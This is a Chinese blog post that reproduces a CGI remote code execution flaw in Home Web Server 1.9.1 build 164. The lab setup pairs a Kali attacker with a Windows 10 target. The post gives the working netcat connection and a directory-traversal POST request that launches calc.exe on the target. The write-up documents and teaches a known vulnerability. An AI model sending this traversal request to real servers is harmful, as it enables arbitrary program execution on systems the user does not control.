• Home Web Server 1.9.1 build 164


    一、  Home Web Server 1.9.1 build 164 - CGI Remote Code Execution复现

    漏洞描述:

    Home Web Server允许调用CGI程序来通过POST请求访问位于/cgi-bin下的文件,然后通过目录遍历,就有可能执行远程主机的任意可执行程序。

    漏洞影响范围:

    Home Web Server 1.9.1 build 164

    漏洞复现:

    利用原理:

    NC连接发送打开计算器请求,安装Home Web Server 1.9.1 build 164的主机就会自动打开计算器程序。

    环境搭建:

    攻击机:Kali-Linux-2017.1-vm-amd64     IP:192.168.18.250

    靶机:Windows 10 Version 1703(x64)   IP:192.168.18.112

    Windows10系统中安装并打开Home Web Server 1.9.1 build 164

     

    Kali中使用NC建立连接,命令为:nc 192.168.18.112 80

    发送POST请求:POST /cgi-bin/../../../../../../../../Windows/system32/calc.exe HTTP/1.1

    当返回400响应时,按Ctrl+C终止请求,此时可以看到windows10自动打开了计算器程序

     

    参考链接:https://www.exploit-db.com/exploits/42128/

  • 相关阅读:
    MCU 51-7 I2C Communication EEPROM
    FinalShell(免费的XShell替代品)
    Docker部署Redis
    Docker-Compose部署ELK
    Linux清空文件
    Linux防火墙的操作
    VSCode远程连接Linux服务器
    Apollo分布式配置中心
    SpringBoot整合log4j2
    MySQL区分大小写
  • 原文地址:https://www.cnblogs.com/peterpan0707007/p/7450797.html
Copyright © 2020-2023  润新知